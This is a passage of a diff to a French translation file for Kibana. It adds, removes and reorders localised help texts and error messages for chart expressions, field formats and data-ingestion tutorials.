\"{sizeUnit}\"", - "expressions.functions.font.invalidTextAlignmentErrorMessage": "Alignement du texte non valide : \"{align}\"", + "expressions.functions.font.args.underlineHelpText": "Souligner le texte ?", + "expressions.functions.font.invalidFontWeightErrorMessage": "Épaisseur de police non valide : \"{weight}\"", + "expressions.functions.font.invalidSizeUnitErrorMessage": "Unité de taille non valide : \"{sizeUnit}\"", + "expressions.functions.font.invalidTextAlignmentErrorMessage": "Alignement du texte non valide : \"{align}\"", "expressions.functions.fontHelpText": "Créez un style de police.", "expressions.functions.mapColumn.args.copyMetaFromHelpText": "Si défini, l'objet méta de l'ID de colonne spécifié est copié dans la colonne cible spécifiée. Si la colonne n'existe pas, un échec silencieux se produit.", - "expressions.functions.mapColumn.args.expressionHelpText": "Une expression qui est exécutée sur chaque ligne, fournie avec un contexte {DATATABLE} de ligne unique et retournant la valeur de la cellule.", "expressions.functions.mapColumn.args.idHelpText": "Un ID facultatif de la colonne de résultat. Si aucun ID n'est fourni, l'ID est récupéré de la colonne existante par l'argument de nom fourni. S'il n'existe pas encore de colonne à ce nom, une nouvelle colonne avec ce nom et un ID identique est ajoutée au tableau.", "expressions.functions.mapColumn.args.nameHelpText": "Le nom de la colonne produite. Les noms n'ont pas besoin d'être uniques.", - "expressions.functions.mapColumnHelpText": "Ajoute une colonne calculée comme le résultat d'autres colonnes. Des modifications ne sont apportées que si des arguments sont fournis. Voir également {alterColumnFn} et {staticColumnFn}.", - "expressions.functions.math.args.expressionHelpText": "Une expression {TINYMATH} évaluée. Voir {TINYMATH_URL}.", - "expressions.functions.math.args.onErrorHelpText": "Si l’évaluation {TINYMATH} échoue ou renvoie NaN, la valeur de retour est spécifiée par onError. Lors de la ''génération'', une exception est levée, terminant l'exécution de l'expression (par défaut).", "expressions.functions.math.emptyDatatableErrorMessage": "Table de données vide", "expressions.functions.math.emptyExpressionErrorMessage": "Expression vide", "expressions.functions.math.executionFailedErrorMessage": "Échec d'exécution de l'expression mathématique. Vérifiez les noms des colonnes.", - "expressions.functions.math.tooManyResultsErrorMessage": "Les expressions doivent retourner un nombre unique. Essayez d'englober votre expression dans {mean} ou {sum}.", "expressions.functions.mathColumn.args.copyMetaFromHelpText": "Si défini, l'objet méta de l'ID de colonne spécifié est copié dans la colonne cible spécifiée. Si la colonne n'existe pas, un échec silencieux se produit.", "expressions.functions.mathColumn.args.idHelpText": "ID de la colonne produite. Doit être unique.", "expressions.functions.mathColumn.args.nameHelpText": "Le nom de la colonne produite. Les noms n'ont pas besoin d'être uniques.", - "expressions.functions.mathColumn.arrayValueError": "Impossible de réaliser le calcul sur les valeurs du tableau à {name}", "expressions.functions.mathColumn.uniqueIdError": "L'ID doit être unique.", - "expressions.functions.mathColumnHelpText": "Ajoute une colonne en évaluant {tinymath} sur chaque ligne. Cette fonction est optimisée pour les mathématiques et livre de meilleures performances par rapport à l'utilisation d'une expression mathématique dans {mapColumnFn}.", - "expressions.functions.mathHelpText": "Interprète une expression mathématique {TINYMATH} à l'aide d'un {TYPE_NUMBER} ou d'une {DATATABLE} en tant que {CONTEXT}. Les colonnes {DATATABLE} peuvent être recherchées d’après leur nom. Si {CONTEXT} est un nombre, il est disponible en tant que {value}.", "expressions.functions.movingAverage.args.byHelpText": "Colonne par laquelle diviser le calcul de la moyenne mobile", "expressions.functions.movingAverage.args.inputColumnIdHelpText": "Colonne pour laquelle calculer la moyenne mobile", "expressions.functions.movingAverage.args.outputColumnIdHelpText": "Colonne dans laquelle stocker le résultat de la moyenne mobile", @@ -3552,88 +2638,99 @@ "expressions.functions.overallMetric.args.outputColumnNameHelpText": "Nom de la colonne dans laquelle stocker le résultat de l’indicateur général", "expressions.functions.overallMetric.help": "Calcule la somme, le minimum, le maximum ou la moyenne générale d'une colonne dans un tableau de données.", "expressions.functions.overallMetric.metricHelpText": "Indicateur à calculer", - "expressions.functions.seriesCalculations.columnConflictMessage": "L'ID de colonne de sortie {columnId} existe déjà. Veuillez choisir un autre ID de colonne.", "expressions.functions.theme.args.defaultHelpText": "La valeur par défaut lorsqu’aucune information de thème n’est disponible.", "expressions.functions.theme.args.variableHelpText": "Nom de la variable de thème à lire.", "expressions.functions.themeHelpText": "Lit un paramètre de thème.", "expressions.functions.uiSetting.args.default": "La valeur par défaut utilisée lorsque le paramètre n’est pas défini.", "expressions.functions.uiSetting.args.parameter": "Le nom du paramètre.", "expressions.functions.uiSetting.error.kibanaRequest": "Une requête Kibana est nécessaire pour obtenir les paramètres de l'interface utilisateur sur le serveur. Veuillez fournir un objet de requête pour les paramètres d'exécution de l'expression.", - "expressions.functions.uiSetting.error.parameter": "Paramètre \"{parameter}\" non valide.", "expressions.functions.uiSetting.help": "Renvoie une valeur de paramètre de l'interface utilisateur.", "expressions.functions.var.help": "Met à jour le contexte général de Kibana.", "expressions.functions.var.name.help": "Spécifiez le nom de la variable.", "expressions.functions.varset.help": "Met à jour le contexte général de Kibana.", "expressions.functions.varset.name.help": "Spécifiez le nom de la variable.", "expressions.functions.varset.val.help": "Spécifiez la valeur de la variable. Sinon, le contexte d'entrée est utilisé.", - "expressions.types.number.fromStringConversionErrorMessage": "Impossible de cataloguer la chaîne \"{string}\" en nombre", - "expressionShape.functions.progress.args.barColorHelpText": "La couleur de la barre d'arrière-plan.", - "expressionShape.functions.progress.args.barWeightHelpText": "L'épaisseur de la barre d'arrière-plan.", "expressionShape.functions.progress.args.fontHelpText": "Les propriétés de la police {CSS} pour l'étiquette. Par exemple, {FONT_FAMILY} ou {FONT_WEIGHT}.", "expressionShape.functions.progress.args.labelHelpText": "Pour afficher ou masquer l'étiquette, utilisez {BOOLEAN_TRUE} ou {BOOLEAN_FALSE}. Vous pouvez également spécifier une chaîne à afficher en tant qu'étiquette.", - "expressionShape.functions.progress.args.maxHelpText": "La valeur maximale de l'élément de progression.", "expressionShape.functions.progress.args.shapeHelpText": "Sélectionnez {list} ou {end}.", + "expressionShape.functions.progress.invalidMaxValueErrorMessage": "Valeur {arg} non valide : \"{max, number}\" ; \"{arg}\" doit être supérieur à 0.", + "expressionShape.functions.progress.invalidValueErrorMessage": "Valeur non valide : \"{value, number}\". La valeur doit être comprise entre 0 et {max, number}.", + "expressionShape.functions.shape.args.borderHelpText": "Une couleur {SVG} pour la bordure de la forme.", + "expressionShape.functions.shape.args.fillHelpText": "Une couleur {SVG} de remplissage de la forme.", + "expressionShape.functions.progress.args.barColorHelpText": "La couleur de la barre d'arrière-plan.", + "expressionShape.functions.progress.args.barWeightHelpText": "L'épaisseur de la barre d'arrière-plan.", + "expressionShape.functions.progress.args.maxHelpText": "La valeur maximale de l'élément de progression.", "expressionShape.functions.progress.args.valueColorHelpText": "La couleur de la barre de progression.", "expressionShape.functions.progress.args.valueWeightHelpText": "L'épaisseur de la barre de progression.", - "expressionShape.functions.progress.invalidMaxValueErrorMessage": "Valeur {arg} non valide : \"{max, number}\" ; \"{arg}\" doit être supérieur à 0.", - "expressionShape.functions.progress.invalidValueErrorMessage": "Valeur non valide : \"{value, number}\". La valeur doit être comprise entre 0 et {max, number}.", "expressionShape.functions.progressHelpText": "Configure un élément de progression.", - "expressionShape.functions.shape.args.borderHelpText": "Une couleur {SVG} pour la bordure de la forme.", "expressionShape.functions.shape.args.borderWidthHelpText": "L'épaisseur de la bordure.", - "expressionShape.functions.shape.args.fillHelpText": "Une couleur {SVG} de remplissage de la forme.", - "expressionShape.functions.shape.args.maintainAspectHelpText": "Conserver le rapport d'origine de la forme ?", + "expressionShape.functions.shape.args.maintainAspectHelpText": "Conserver le rapport d'origine de la forme ?", "expressionShape.functions.shape.args.shapeHelpText": "Choisissez une forme.", - "expressionShape.functions.shape.invalidShapeErrorMessage": "Valeur non valide : \"{shape}\". Cette forme n'existe pas.", + "expressionShape.functions.shape.invalidShapeErrorMessage": "Valeur non valide : \"{shape}\". Cette forme n'existe pas.", "expressionShape.functions.shapeHelpText": "Crée une forme.", "expressionShape.renderer.progress.displayName": "Progression", "expressionShape.renderer.progress.helpDescription": "Présenter une progression basique", "expressionShape.renderer.shape.displayName": "Forme", "expressionShape.renderer.shape.helpDescription": "Présenter une forme basique", - "expressionTagcloud.feedbackMessage.tooSmallContainerDescription": "Le conteneur est trop petit pour afficher l'ensemble du nuage. Les balises peuvent être rognées ou omises.", - "expressionTagcloud.feedbackMessage.truncatedTagsDescription": "Le nombre de balises a été tronqué pour éviter des temps de traçage trop longs.", - "expressionTagcloud.functions.tagcloud.args.ariaLabelHelpText": "Spécifie l'attribut aria-label du nuage de balises", - "expressionTagcloud.functions.tagcloud.args.bucketHelpText": "configuration des dimensions de compartiment", - "expressionTagcloud.functions.tagcloud.args.maxFontSizeHelpText": "Taille maximale de la police", - "expressionTagcloud.functions.tagcloud.args.metricHelpText": "configuration des dimensions d’indicateur", - "expressionTagcloud.functions.tagcloud.args.minFontSizeHelpText": "Taille minimale de la police", - "expressionTagcloud.functions.tagcloud.args.orientationHelpText": "Orientation des mots dans le nuage de balises", - "expressionTagcloud.functions.tagcloud.args.paletteHelpText": "Définit le nom de la palette du graphique.", - "expressionTagcloud.functions.tagcloud.args.scaleHelpText": "Échelle pour déterminer la taille de police d'un mot", - "expressionTagcloud.functions.tagcloud.args.showLabelHelpText": "Afficher l'étiquette du graphique", - "expressionTagcloud.functions.tagcloud.dimension.tags": "Balises", - "expressionTagcloud.functions.tagcloud.dimension.tagSize": "Taille de balise", - "expressionTagcloud.functions.tagcloud.invalidImageUrl": "URL d'image non valide : \"{imageUrl}\".", - "expressionTagcloud.functions.tagcloud.invalidPercentErrorMessage": "Valeur non valide : \"{percent}\". Le pourcentage doit être compris entre 0 et 1.", - "expressionTagcloud.functions.tagcloudHelpText": "Visualisation du nuage de balises.", - "expressionTagcloud.renderer.tagcloud.displayName": "Visualisation du nuage de balises", - "expressionTagcloud.renderer.tagcloud.helpDescription": "Afficher le rendu d'un nuage de balises", + "expressionXY.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", "expressionXY.annotationLayer.annotations.help": "Annotations", - "expressionXY.annotationLayer.help": "Configurer un calque d'annotation dans le graphique xy", + "expressionXY.annotationLayer.help": "Configurer un calque d'annotation dans le graphique xy", + "expressionXY.annotationLayer.simpleView.help": "Afficher/masquer les détails", + "expressionXY.axisConfig.boundsMargin.help": "Marge des limites", + "expressionXY.axisConfig.extent.help": "Portée de l'axe", + "expressionXY.axisConfig.hide.help": "Masquer l’axe", + "expressionXY.axisConfig.labelColor.help": "Couleur des étiquettes de l'axe", + "expressionXY.axisConfig.labelsOrientation.help": "Spécifie l'orientation des étiquettes de l'axe", + "expressionXY.axisConfig.mode.help": "Mode échelle. Peut être normal, pourcentage, ondulé ou silhouette", + "expressionXY.axisConfig.position.help": "Position de l’axe", + "expressionXY.axisConfig.scaleType.help": "Le type d'échelle de l'axe", + "expressionXY.axisConfig.showDuplicates.help": "Afficher les coches dupliquées", + "expressionXY.axisConfig.showGridLines.help": "Spécifie si le quadrillage de l'axe est visible ou non", + "expressionXY.axisConfig.showLabels.help": "Afficher les étiquettes", + "expressionXY.axisConfig.showOverlappingLabels.help": "Afficher les étiquettes qui se chevauchent", + "expressionXY.axisConfig.showTitle.help": "Afficher le titre de l’axe", + "expressionXY.axisConfig.title.help": "Titre de l’axe", + "expressionXY.axisConfig.truncate.help": "Nombre de symboles avant troncature", "expressionXY.axisExtentConfig.extentMode.help": "Mode d'extension", - "expressionXY.axisExtentConfig.help": "Configurer les étendues d'axe du graphique xy", + "expressionXY.axisExtentConfig.help": "Configurer les étendues d'axe du graphique xy", "expressionXY.axisExtentConfig.lowerBound.help": "Limite inférieure", "expressionXY.axisExtentConfig.upperBound.help": "Limite supérieure", - "expressionXY.dataLayer.accessors.help": "Les colonnes à afficher sur l'axe y.", - "expressionXY.dataLayer.help": "Configurer un calque dans le graphique xy", + "expressionXY.dataDecorationConfig.help": "Configurer la décoration des données", + "expressionXY.dataLayer.accessors.help": "Les colonnes à afficher sur l'axe y.", + "expressionXY.dataLayer.decorations.help": "Décoration supplémentaire des données", + "expressionXY.dataLayer.help": "Configurer un calque dans le graphique xy", "expressionXY.dataLayer.isHistogram.help": "Disposer le graphique sous forme d'histogramme ou non", + "expressionXY.dataLayer.isHorizontal.help": "Le graphique est disposé horizontalement", + "expressionXY.dataLayer.isPercentage.help": "Mode de pourcentage ou non du graphique", + "expressionXY.dataLayer.isStacked.help": "Le graphique est disposé en mode empilé", "expressionXY.dataLayer.lineWidth.help": "Largeur de la ligne", "expressionXY.dataLayer.markSizeAccessor.help": "Accesseur de taille de marque", "expressionXY.dataLayer.palette.help": "Palette", "expressionXY.dataLayer.pointsRadius.help": "Rayon des points", "expressionXY.dataLayer.seriesType.help": "Type de graphique à afficher.", + "expressionXY.dataLayer.showLines.help": "Afficher des lignes entre les points", "expressionXY.dataLayer.showPoints.help": "Afficher les points", + "expressionXY.dataLayer.simpleView.help": "Afficher/masquer les détails", "expressionXY.dataLayer.splitAccessor.help": "Colonne selon laquelle effectuer la division", "expressionXY.dataLayer.xAccessor.help": "Axe X", - "expressionXY.dataLayer.xScaleType.help": "Type d'échelle de l'axe x", + "expressionXY.dataLayer.xScaleType.help": "Type d'échelle de l'axe x", + "expressionXY.decorationConfig.axisId.help": "ID de l’axe", + "expressionXY.decorationConfig.color.help": "La couleur des séries", + "expressionXY.decorationConfig.fill.help": "Remplir", + "expressionXY.decorationConfig.forAccessor.help": "l'accesseur auquel cette configuration s’applique", + "expressionXY.decorationConfig.icon.help": "Icône facultative utilisée pour les lignes de référence", + "expressionXY.decorationConfig.iconPosition.help": "Le placement de l'icône pour la ligne de référence", + "expressionXY.decorationConfig.lineStyle.help": "Le style de la ligne de référence", + "expressionXY.decorationConfig.lineWidth.help": "La largeur de la ligne de référence", + "expressionXY.decorationConfig.textVisibility.help": "Visibilité de l'étiquette sur la ligne de référence", "expressionXY.layer.columnToLabel.help": "Paires clé-valeur JSON de l'ID de colonne pour l'étiquette", "expressionXY.layeredXyVis.layers.help": "Calques de série visuelle", "expressionXY.layers.layerId.help": "ID du calque", "expressionXY.layers.table.help": "Tableau", "expressionXY.legend.filterForValueButtonAriaLabel": "Filtrer sur la valeur", - "expressionXY.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", "expressionXY.legend.filterOutValueButtonAriaLabel": "Exclure la valeur", "expressionXY.legendConfig.floatingColumns.help": "Spécifie le nombre de colonnes lorsque la légende est affichée à l'intérieur du graphique.", - "expressionXY.legendConfig.help": "Configurer la légende du graphique xy", + "expressionXY.legendConfig.help": "Configurer la légende du graphique xy", "expressionXY.legendConfig.horizontalAlignment.help": "Spécifie l'alignement horizontal de la légende lorsqu'elle est affichée à l'intérieur du graphique.", "expressionXY.legendConfig.isInside.help": "Spécifie si une légende se trouve à l'intérieur d'un graphique", "expressionXY.legendConfig.isVisible.help": "Spécifie si la légende est visible ou non.", @@ -3643,21 +2740,29 @@ "expressionXY.legendConfig.shouldTruncate.help": "Spécifie si les éléments de légende seront tronqués ou non", "expressionXY.legendConfig.showSingleSeries.help": "Spécifie si une légende comportant une seule entrée doit être affichée", "expressionXY.legendConfig.verticalAlignment.help": "Spécifie l'alignement vertical de la légende lorsqu'elle est affichée à l'intérieur du graphique.", + "expressionXY.partialData.bucketTooltipText": "La plage temporelle sélectionnée n'inclut pas ce compartiment en entier. Il se peut qu'elle contienne des données partielles.", + "expressionXY.referenceLine.axisId.help": "ID de l'axe auquel appartient la ligne de référence. Sa priorité est plus élevée que \"position\".", "expressionXY.referenceLine.name.help": "Nom de la ligne de référence", + "expressionXY.referenceLine.position.help": "Position de l'axe (premier axe de cette position) auquel appartient la ligne de référence.", "expressionXY.referenceLine.Value.help": "Valeur de la ligne de référence", - "expressionXY.referenceLineLayer.accessors.help": "Les colonnes à afficher sur l'axe y.", - "expressionXY.referenceLineLayer.help": "Configurer une ligne de référence dans le graphique xy", + "expressionXY.referenceLineLayer.accessors.help": "Les colonnes à afficher sur l'axe y.", + "expressionXY.referenceLineLayer.decorationConfig.help": "Décoration supplémentaire de la ligne de référence", + "expressionXY.referenceLineLayer.help": "Configurer une ligne de référence dans le graphique xy", "expressionXY.reusable.function.axisExtentConfig.errors.emptyUpperBound": "La limite supérieure doit être supérieure à la limite inférieure, si le mode personnalisé est activé.", "expressionXY.reusable.function.dataLayer.errors.markSizeAccessorForNonLineOrAreaChartsError": "Impossible d'utiliser \"markSizeAccessor\". Les points sont appliqués uniquement pour les graphiques linéaires ou les graphiques en aires", "expressionXY.reusable.function.legendConfig.errors.alignmentUsageWithFalsyIsInsideError": "Les arguments \"horizontalAlignment\" et \"verticalAlignment\" ne sont pas appliqués si \"isInside = false\". Veuillez utiliser l'argument \"position\" à la place.", "expressionXY.reusable.function.legendConfig.errors.floatingColumnsWithFalsyIsInsideError": "Les arguments \"floatingColumns\" ne sont pas appliqués si \"isInside = false\".", "expressionXY.reusable.function.legendConfig.errors.legendSizeWithFalsyIsInsideError": "L'argument \"legendSize\" n'est pas appliqué si \"isInside = false\".", "expressionXY.reusable.function.legendConfig.errors.positionUsageWithIsInsideError": "L'argument \"position\" n'est pas appliqué si \"isInside = true\". Veuillez utiliser les arguments \"horizontalAlignment\" et \"verticalAlignment\" à la place.", + "expressionXY.reusable.function.xyVis.errors.axisIsNotAssignedError": "L'axe avec l'ID : \"{axisId}\" n'est assigné à aucun accesseur. Veuillez attribuer un axe en utilisant la construction suivante : `decorations=\\{dataDecorationConfig forAccessor=\"your-accessor\" axisId=\"{axisId}\"\\}`", "expressionXY.reusable.function.xyVis.errors.dataBoundsForNotLineChartError": "Seuls les graphiques linéaires peuvent être adaptés aux limites de données", - "expressionXY.reusable.function.xyVis.errors.extendBoundsAreInvalidError": "Pour les modes de graphiques en aires et à barres, et le mode d'extension personnalisée, la limite inférieure doit être inférieure ou supérieure à 0, et la limite supérieure doit être supérieure ou égale à 0", - "expressionXY.reusable.function.xyVis.errors.isInvalidIntervalError": "L'intervalle de l'axe X fourni n'est pas valide. L'intervalle doit inclure une quantité et des noms d'unité. Exemples : 1d, 24h, 1w.", + "expressionXY.reusable.function.xyVis.errors.extendBoundsAreInvalidError": "Pour les modes de graphiques en aires et à barres, et le mode d'extension personnalisée, la limite inférieure doit être inférieure ou supérieure à 0, et la limite supérieure doit être supérieure ou égale à 0", + "expressionXY.reusable.function.xyVis.errors.extentFullModeIsInvalid": "Pour la portée de l'axe x, le mode complet n'est pas pris en charge.", + "expressionXY.reusable.function.xyVis.errors.extentModeNotSupportedError": "La portée de l'axe x n'est prise en charge que pour les histogrammes numériques.", + "expressionXY.reusable.function.xyVis.errors.isInvalidIntervalError": "L'intervalle de l'axe X fourni n'est pas valide. L'intervalle doit inclure une quantité et des noms d'unité. Exemples : 1d, 24h, 1w.", + "expressionXY.reusable.function.xyVis.errors.linesVisibilityForNonLineChartError": "La visibilité des lignes ne peut être contrôlée que sur les graphiques linéaires.", "expressionXY.reusable.function.xyVis.errors.lineWidthForNonLineOrAreaChartError": "\"lineWidth\" peut être appliqué uniquement aux graphiques linéaires ou aux graphiques en aires", - "expressionXY.reusable.function.xyVis.errors.markSizeLimitsError": "Le rapport de taille de marque doit être supérieur ou égal à 1 et inférieur ou égal à 100", + "expressionXY.reusable.function.xyVis.errors.markSizeLimitsError": "Le rapport de taille de marque doit être supérieur ou égal à 1 et inférieur ou égal à 100", "expressionXY.reusable.function.xyVis.errors.markSizeRatioWithoutAccessor": "Le rapport de taille de marque peut être appliqué uniquement avec \"markSizeAccessor\"", "expressionXY.reusable.function.xyVis.errors.minTimeBarIntervalNotForTimeBarChartError": "L'argument \"minTimeBarInterval\" s'applique uniquement aux graphiques temporels à barres.", "expressionXY.reusable.function.xyVis.errors.notUsedFillOpacityError": "L'argument \"fillOpacity\" s'applique uniquement aux graphiques en aires.", @@ -3665,6 +2770,7 @@ "expressionXY.reusable.function.xyVis.errors.showPointsForNonLineOrAreaChartError": "\"showPoints\" peut être appliqué uniquement aux graphiques linéaires ou aux graphiques en aires", "expressionXY.reusable.function.xyVis.errors.timeMarkerForNotTimeChartsError": "Seuls les graphiques temporels peuvent avoir un repère de temps actuel", "expressionXY.reusable.function.xyVis.errors.valueLabelsForNotBarsOrHistogramBarsChartsError": "L'argument \"valueLabels\" s'applique uniquement aux graphiques à barres qui ne sont pas des histogrammes.", + "expressionXY.xAxisConfigFn.help": "Configurer la config de l'axe x du graphique xy", "expressionXY.xyChart.emptyXLabel": "(vide)", "expressionXY.xyChart.iconSelect.alertIconLabel": "Alerte", "expressionXY.xyChart.iconSelect.asteriskIconLabel": "Astérisque", @@ -3683,9 +2789,10 @@ "expressionXY.xyChart.iconSelect.triangleIconLabel": "Triangle", "expressionXY.xyVis.addTimeMaker.help": "Afficher le repère de temps", "expressionXY.xyVis.annotationLayer.help": "Calque d'annotation", - "expressionXY.xyVis.ariaLabel.help": "Spécifie l'attribut aria-label du graphique xy", + "expressionXY.xyVis.ariaLabel.help": "Spécifie l'attribut aria-label du graphique xy", "expressionXY.xyVis.curveType.help": "Définir de quelle façon le type de courbe est rendu pour un graphique linéaire", "expressionXY.xyVis.dataLayer.help": "Calque de données de série visuelle", + "expressionXY.xyVis.detailedTooltip.help": "Afficher l'infobulle détaillée", "expressionXY.xyVis.endValue.help": "Valeur de fin", "expressionXY.xyVis.fillOpacity.help": "Définir l'opacité du remplissage du graphique en aires", "expressionXY.xyVis.fittingFunction.help": "Définir le mode de traitement des valeurs manquantes", @@ -3696,35 +2803,41 @@ "expressionXY.xyVis.logDatatable.metric": "Axe vertical", "expressionXY.xyVis.logDatatable.x": "Axe horizontal", "expressionXY.xyVis.markSizeRatio.help": "Spécifie le rapport des points pour les graphiques linéaires et les graphiques en aires", + "expressionXY.xyVis.orderBucketsBySum.help": "Classer les groupes par somme", "expressionXY.xyVis.referenceLines.help": "Ligne de référence", - "expressionXY.xyVis.renderer.help": "Outil de rendu de graphique X/Y", - "expressionXY.xyVis.splitColumnAccessor.help": "Spécifie la colonne fractionnée du graphique xy", - "expressionXY.xyVis.splitRowAccessor.help": "Spécifie la ligne fractionnée du graphique xy", + "expressionXY.xyVis.renderer.help": "Outil de rendu de graphique X/Y", + "expressionXY.xyVis.showTooltip.help": "Afficher l'infobulle", + "expressionXY.xyVis.splitColumnAccessor.help": "Spécifie la colonne fractionnée du graphique xy", + "expressionXY.xyVis.splitRowAccessor.help": "Spécifie la ligne fractionnée du graphique xy", "expressionXY.xyVis.valueLabels.help": "Mode des étiquettes de valeur", "expressionXY.xyVis.valuesInLegend.help": "Afficher les valeurs dans la légende", + "expressionXY.xyVis.xAxisConfig.help": "Spécifie la configuration de l'axe x", "expressionXY.xyVis.xAxisInterval.help": "Spécifie l'intervalle minimal pour le graphique temporel à barres", - "fieldFormats.advancedSettings.format.bytesFormat.numeralFormatLinkText": "Format numérique", + "expressionXY.xyVis.yAxisConfigs.help": "Spécifie les configurations des axes y", + "expressionXY.yAxisConfigFn.help": "Configurer la config de l'axe y du graphique xy", "fieldFormats.advancedSettings.format.bytesFormatText": "{numeralFormatLink} par défaut pour le format \"octets\"", - "fieldFormats.advancedSettings.format.bytesFormatTitle": "Format octets", - "fieldFormats.advancedSettings.format.currencyFormat.numeralFormatLinkText": "Format numérique", "fieldFormats.advancedSettings.format.currencyFormatText": "{numeralFormatLink} par défaut pour le format \"devise\"", - "fieldFormats.advancedSettings.format.currencyFormatTitle": "Format devise", "fieldFormats.advancedSettings.format.defaultTypeMapText": "Mapping du nom du format à utiliser par défaut pour chaque type de champ. Le format {defaultFormat} est utilisé lorsque le type de champ n'est pas mentionné explicitement.", + "fieldFormats.advancedSettings.format.formattingLocaleText": "Paramètre régional {numeralLanguageLink}", + "fieldFormats.advancedSettings.format.numberFormatText": "{numeralFormatLink} par défaut pour le format \"nombre\"", + "fieldFormats.advancedSettings.format.percentFormatText": "{numeralFormatLink} par défaut pour le format \"pourcentage\"", + "fieldFormats.advancedSettings.format.bytesFormat.numeralFormatLinkText": "Format numérique", + "fieldFormats.advancedSettings.format.bytesFormatTitle": "Format octets", + "fieldFormats.advancedSettings.format.currencyFormat.numeralFormatLinkText": "Format numérique", + "fieldFormats.advancedSettings.format.currencyFormatTitle": "Format devise", "fieldFormats.advancedSettings.format.defaultTypeMapTitle": "Nom du format du type de champ", "fieldFormats.advancedSettings.format.formattingLocale.numeralLanguageLinkText": "Langage numérique", - "fieldFormats.advancedSettings.format.formattingLocaleText": "Paramètre régional {numeralLanguageLink}", "fieldFormats.advancedSettings.format.formattingLocaleTitle": "Paramètre régional de format", "fieldFormats.advancedSettings.format.numberFormat.numeralFormatLinkText": "Format numérique", - "fieldFormats.advancedSettings.format.numberFormatText": "{numeralFormatLink} par défaut pour le format \"nombre\"", - "fieldFormats.advancedSettings.format.numberFormatTitle": "Format nombre", + "fieldFormats.advancedSettings.format.numberFormatTitle": "Format de nombre", "fieldFormats.advancedSettings.format.percentFormat.numeralFormatLinkText": "Format numérique", - "fieldFormats.advancedSettings.format.percentFormatText": "{numeralFormatLink} par défaut pour le format \"pourcentage\"", "fieldFormats.advancedSettings.format.percentFormatTitle": "Format pourcentage", "fieldFormats.advancedSettings.shortenFieldsText": "Raccourcir les champs longs, par exemple f.b.baz plutôt que foo.bar.baz", "fieldFormats.advancedSettings.shortenFieldsTitle": "Raccourcir les champs", "fieldFormats.boolean.title": "Booléen", "fieldFormats.bytes.title": "Octets", "fieldFormats.color.title": "Couleur", + "fieldFormats.currency.title": "Devise", "fieldFormats.date_nanos.title": "Date nanos", "fieldFormats.date.title": "Date", "fieldFormats.duration.inputFormats.days": "Jours", @@ -3759,11 +2872,11 @@ "fieldFormats.duration.outputFormats.humanize.precise": "Lisible par l'humain (précis)", "fieldFormats.duration.title": "Durée", "fieldFormats.geoPoint.title": "Point géographique", - "fieldFormats.geoPoint.transformOptions.latLonString": "chaîne avec le format : \"lat,lon\"", + "fieldFormats.geoPoint.transformOptions.latLonString": "chaîne avec le format : \"lat,lon\"", "fieldFormats.geoPoint.transformOptions.none": "- Aucune -", "fieldFormats.geoPoint.transformOptions.wkt": "Texte bien connu", "fieldFormats.histogram.title": "Histogramme", - "fieldFormats.ip.title": "Adresse IP", + "fieldFormats.ip.title": "Adresse IP", "fieldFormats.number.title": "Nombre", "fieldFormats.percent.title": "Pourcentage", "fieldFormats.relative_date.title": "Date relative", @@ -3776,45 +2889,271 @@ "fieldFormats.string.transformOptions.short": "Points courts", "fieldFormats.string.transformOptions.title": "Initiale majuscule", "fieldFormats.string.transformOptions.upper": "Majuscule", - "fieldFormats.string.transformOptions.url": "Décodage paramètre URL", + "fieldFormats.string.transformOptions.url": "Décodage paramètre URL", "fieldFormats.truncated_string.title": "Chaîne tronquée", "fieldFormats.url.title": "Url", "fieldFormats.url.types.audio": "Audio", "fieldFormats.url.types.img": "Image", "fieldFormats.url.types.link": "Lien", - "flot.pie.unableToDrawLabelsInsideCanvasErrorMessage": "Impossible de dessiner un graphique avec les étiquettes contenues dans la toile", - "flot.time.aprLabel": "Avr", - "flot.time.augLabel": "Août", - "flot.time.decLabel": "Déc", - "flot.time.febLabel": "Févr", - "flot.time.friLabel": "Ven", - "flot.time.janLabel": "Jan", - "flot.time.julLabel": "Juil", - "flot.time.junLabel": "Juin", - "flot.time.marLabel": "Mars", - "flot.time.mayLabel": "Mai", - "flot.time.monLabel": "Lun", - "flot.time.novLabel": "Nov", - "flot.time.octLabel": "Oct", - "flot.time.satLabel": "Sam", - "flot.time.sepLabel": "Sept", - "flot.time.sunLabel": "Dim", - "flot.time.thuLabel": "Jeu", - "flot.time.tueLabel": "Mar", - "flot.time.wedLabel": "Mer", + "home.loadTutorials.requestFailedErrorMessage": "Échec de la requête avec le code de statut : {status}", + "home.tutorial.addDataToKibanaDescription": "En plus d'ajouter {integrationsLink}, vous pouvez essayer l'exemple de données ou charger vos propres données.", + "home.tutorial.noTutorialLabel": "Tutoriel {tutorialId} introuvable", + "home.tutorial.savedObject.addedLabel": "{savedObjectsLength} objets enregistrés ont bien été ajoutés.", + "home.tutorial.savedObject.installStatusLabel": "{overwriteErrorsLength} objets sur {savedObjectsLength} existent déjà. Cliquez sur \"Confirmer l'écrasement\" pour importer et écraser les objets existants. Toute modification apportée aux objets sera perdue.", + "home.tutorial.savedObject.requestFailedErrorMessage": "Échec de la requête. Erreur : {message}.", + "home.tutorial.savedObject.unableToAddErrorMessage": "Impossible d'ajouter {errorsLength} objets Kibana sur {savedObjectsLength} . Erreur : {errorMessage}.", + "home.tutorial.unexpectedStatusCheckStateErrorDescription": "État de vérification du statut {statusCheckState} inattendu", + "home.tutorial.unhandledInstructionTypeErrorDescription": "Type d'instructions {visibleInstructions} non pris en charge", + "home.tutorials.activemqLogs.longDescription": "Collectez les logs ActiveMQ avec Filebeat. [En savoir plus]({learnMoreLink}).", + "home.tutorials.activemqMetrics.longDescription": "Le module Metricbeat ''activemq'' récupère les indicateurs depuis les instances ActiveMQ. [En savoir plus]({learnMoreLink}).", + "home.tutorials.aerospikeMetrics.longDescription": "Le module Metricbeat ''aerospike'' récupère les indicateurs d'Aerospike. [En savoir plus]({learnMoreLink}).", + "home.tutorials.apacheLogs.longDescription": "Le module Filebeat ''apache'' analyse les logs d'accès et d'erreurs créés par le serveur HTTP Apache. [En savoir plus]({learnMoreLink}).", + "home.tutorials.apacheMetrics.longDescription": "Le module Metricbeat ''apache'' récupère les indicateurs depuis le serveur HTTP Apache 2. [En savoir plus]({learnMoreLink}).", + "home.tutorials.auditbeat.longDescription": "Utilisez Auditbeat pour collecter les données d'audit de vos hôtes. Ces données incluent les processus, utilisateurs, connexions, informations de socket, accès aux fichiers et bien plus encore. [En savoir plus]({learnMoreLink}).", + "home.tutorials.auditdLogs.longDescription": "Le module collecte et analyse les logs du 